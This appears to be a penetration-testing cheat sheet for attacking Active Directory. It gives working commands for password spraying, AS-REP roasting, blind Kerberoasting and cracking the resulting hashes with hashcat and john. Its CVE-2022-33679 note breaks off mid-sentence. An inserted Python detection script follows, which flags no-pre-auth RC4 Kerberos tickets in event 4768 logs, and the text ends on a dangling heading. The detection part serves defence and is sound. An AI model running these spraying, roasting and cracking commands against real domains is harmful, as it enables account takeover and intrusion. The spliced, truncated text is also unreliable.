Username - no password

  1. Password policy

enum4linux-ng -P $ip
enum4linux-ng -u 'user' -p 'password' -P $ip
nxc smb $ip -u 'username' -p 'password' --pass-pol

  1. Password spraying

nxc smb $ip -u users.txt -p users.txt --no-bruteforce --continue-on-success
nxc smb $ip -u users.txt -p /usr/share/wordlists/rockyou.txt --no-bruteforce --continue-on-success

  1. AS-REP Roasting

impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $ip 'htb.local/'
sudo hashcat -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
john --wordlist=/usr/share/wordlists/rockyou.txt ASREProastables.txt

  1. Blind Kerberoasting

impacket-GetUserSPNs -no-preauth 'username' -usersfile users.txt -dc-host $ip -outputfile hashes.kerberoast 'domain.local/'
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast

  1. CVE-2022-33679 - Windows Kerberos Elevation of Privilege

The attack targets Windows domain accounts with Kerberos pre-authentication disabled and attempts an encryption downgrade.

CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4
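Added detection example, not part of the original notes: it parses constructed Windows Security event 4768 (Kerberos AS-REQ) lines and flags tickets issued to accounts without pre-authentication using RC4-HMAC (the AS-REP roasting pattern above) or RC4-MD4 (the CVE-2022-33679 downgrade pattern). Field names follow event 4768; the sample records and the unsigned hex rendering of RC4-MD4 (etype -128 as 0xFFFFFF80) are assumptions.

```python
from collections import Counter

# Constructed Windows Security event 4768 (Kerberos AS-REQ) records, flattened to
# "Field: value | Field: value" lines. Sample data for this example, not real logs.
SAMPLE_4768 = [
    "Account Name: svc_backup | Client Address: ::ffff:10.0.0.25 | Result Code: 0x0 | Ticket Encryption Type: 0x17 | Pre-Authentication Type: 0",
    "Account Name: alice | Client Address: ::ffff:10.0.0.7 | Result Code: 0x0 | Ticket Encryption Type: 0x12 | Pre-Authentication Type: 2",
    "Account Name: legacyapp | Client Address: ::ffff:10.0.0.25 | Result Code: 0x0 | Ticket Encryption Type: 0xFFFFFF80 | Pre-Authentication Type: 0",
    "Account Name: bob | Client Address: ::ffff:10.0.0.9 | Result Code: 0x18 | Ticket Encryption Type: 0xFFFFFFFF | Pre-Authentication Type: 2",
]

STRONG_ETYPES = {0x11, 0x12}  # AES128-CTS-HMAC-SHA1-96, AES256-CTS-HMAC-SHA1-96
RC4_MD4 = -128                # legacy etype the CVE-2022-33679 downgrade forces

def parse_4768(line):
    """Parse one flattened 4768 line into typed fields."""
    fields = dict(part.split(": ", 1) for part in line.split(" | "))
    etype = int(fields["Ticket Encryption Type"], 16)
    if etype >= 2**31:  # the log renders etype as unsigned 32-bit hex (assumption);
        etype -= 2**32  # fold back to the signed value, so 0xFFFFFF80 -> -128
    return {"account": fields["Account Name"], "client": fields["Client Address"],
            "result": int(fields["Result Code"], 16), "etype": etype,
            "preauth": int(fields["Pre-Authentication Type"])}

def classify(ev):
    """Return a finding string, or None when the event is benign."""
    if ev["result"] != 0 or ev["preauth"] != 0:
        return None  # no ticket issued, or pre-auth enforced: nothing to roast
    if ev["etype"] == RC4_MD4:
        return "RC4-MD4 ticket without pre-auth (CVE-2022-33679 downgrade pattern)"
    if ev["etype"] not in STRONG_ETYPES:
        return f"AS-REP roastable: no pre-auth, weak etype {ev['etype']:#x}"
    return "no pre-auth but AES ticket (hygiene: enable pre-auth on the account)"

def scan(lines):
    """Return (account, client, finding) tuples for every suspicious event."""
    events = map(parse_4768, lines)
    return [(e["account"], e["client"], f) for e in events if (f := classify(e))]

def roast_sources(findings, threshold=2):
    """Clients that pulled no-pre-auth tickets for several accounts: likely sweeps."""
    counts = Counter(client for _, client, _ in findings)
    return {c: n for c, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    hits = scan(SAMPLE_4768)
    for hit in hits:
        print(" | ".join(hit))
    print("likely roast sources:", roast_sources(hits))
```

Feed it the 4768 events exported from a domain controller; one client address collecting no-pre-auth tickets for many accounts is the signature of the GetNPUsers sweep shown above.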


  1. List users with pre-auth disabled (AS-REP roastable; credentials needed)
